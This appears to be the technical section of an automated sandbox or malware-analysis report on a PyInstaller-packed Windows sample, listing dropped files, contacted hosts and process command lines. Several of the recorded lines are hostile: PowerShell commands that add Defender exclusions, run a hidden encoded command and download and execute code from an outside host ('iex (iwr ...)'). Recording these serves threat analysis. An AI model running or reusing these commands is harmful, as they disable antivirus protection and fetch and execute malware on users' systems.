Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W Hidden -C "Add-MpPreference -ExclusionPath '<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe' -EA 0; Add-MpPreference -ExclusionProcess 'powershell.exe' -EA 0; Add-MpPreference -ExclusionPro...
- %TEMP%\_mei29122\vcruntime140.dll
- %TEMP%\_mei29122\_bz2.pyd
- %TEMP%\_mei29122\_ctypes.pyd
- %TEMP%\_mei29122\_decimal.pyd
- %TEMP%\_mei29122\_hashlib.pyd
- %TEMP%\_mei29122\_lzma.pyd
- %TEMP%\_mei29122\_socket.pyd
- %TEMP%\_mei29122\api-ms-win-core-console-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-datetime-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-debug-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-errorhandling-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-fibers-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-fibers-l1-1-1.dll
- %TEMP%\_mei29122\api-ms-win-core-file-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-file-l1-2-0.dll
- %TEMP%\_mei29122\api-ms-win-core-file-l2-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-handle-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-heap-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-interlocked-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-kernel32-legacy-l1-1-1.dll
- %TEMP%\_mei29122\api-ms-win-core-libraryloader-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-localization-l1-2-0.dll
- %TEMP%\_mei29122\api-ms-win-core-memory-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-namedpipe-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-processenvironment-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-processthreads-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-processthreads-l1-1-1.dll
- %TEMP%\_mei29122\api-ms-win-core-profile-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-rtlsupport-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-string-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-synch-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-synch-l1-2-0.dll
- %TEMP%\_mei29122\api-ms-win-core-sysinfo-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-sysinfo-l1-2-0.dll
- %TEMP%\_mei29122\api-ms-win-core-timezone-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-util-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-conio-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-convert-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-environment-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-filesystem-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-heap-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-locale-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-math-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-process-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-runtime-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-stdio-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-string-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-time-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-utility-l1-1-0.dll
- %TEMP%\_mei29122\base_library.zip
- %TEMP%\_mei29122\libcrypto-3.dll
- %TEMP%\_mei29122\libffi-8.dll
- %TEMP%\_mei29122\python312.dll
- %TEMP%\_mei29122\select.pyd
- %TEMP%\_mei29122\ucrtbase.dll
- %TEMP%\_mei29122\unicodedata.pyd
- %TEMP%\lc687hu1
- %TEMP%\windefconfig.cmd
- %TEMP%\lc687hu1
- %TEMP%\windefconfig.cmd
- %TEMP%\_mei29122\api-ms-win-core-console-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-datetime-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-debug-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-errorhandling-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-fibers-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-fibers-l1-1-1.dll
- %TEMP%\_mei29122\api-ms-win-core-file-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-file-l1-2-0.dll
- %TEMP%\_mei29122\api-ms-win-core-file-l2-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-handle-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-heap-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-interlocked-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-kernel32-legacy-l1-1-1.dll
- %TEMP%\_mei29122\api-ms-win-core-libraryloader-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-localization-l1-2-0.dll
- %TEMP%\_mei29122\api-ms-win-core-memory-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-namedpipe-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-processenvironment-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-processthreads-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-processthreads-l1-1-1.dll
- %TEMP%\_mei29122\api-ms-win-core-profile-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-rtlsupport-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-string-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-synch-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-synch-l1-2-0.dll
- %TEMP%\_mei29122\api-ms-win-core-sysinfo-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-sysinfo-l1-2-0.dll
- %TEMP%\_mei29122\api-ms-win-core-timezone-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-core-util-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-conio-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-convert-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-environment-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-filesystem-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-heap-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-locale-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-math-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-process-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-runtime-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-stdio-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-string-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-time-l1-1-0.dll
- %TEMP%\_mei29122\api-ms-win-crt-utility-l1-1-0.dll
- %TEMP%\_mei29122\base_library.zip
- %TEMP%\_mei29122\libcrypto-3.dll
- %TEMP%\_mei29122\libffi-8.dll
- %TEMP%\_mei29122\python312.dll
- %TEMP%\_mei29122\select.pyd
- %TEMP%\_mei29122\ucrtbase.dll
- %TEMP%\_mei29122\unicodedata.pyd
- %TEMP%\_mei29122\vcruntime140.dll
- %TEMP%\_mei29122\_bz2.pyd
- %TEMP%\_mei29122\_ctypes.pyd
- %TEMP%\_mei29122\_decimal.pyd
- %TEMP%\_mei29122\_hashlib.pyd
- %TEMP%\_mei29122\_lzma.pyd
- %TEMP%\_mei29122\_socket.pyd
- 'si####en.indevs.in':443
- 'fi###.catbox.moe':443
- 'si####en.indevs.in':443
- 'fi###.catbox.moe':443
- DNS ASK si####en.indevs.in
- DNS ASK fi###.catbox.moe
- '<SYSTEM32>\cmd.exe' /c %TEMP%\WinDefConfig.cmd
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBBAHIAZwB1A...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c iex (iwr https://sixseven.indevs.in/ -UseBasicParsing)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c iex (iwr https://sixseven.indevs.in/ -UseBasicParsing)' (with hidden window)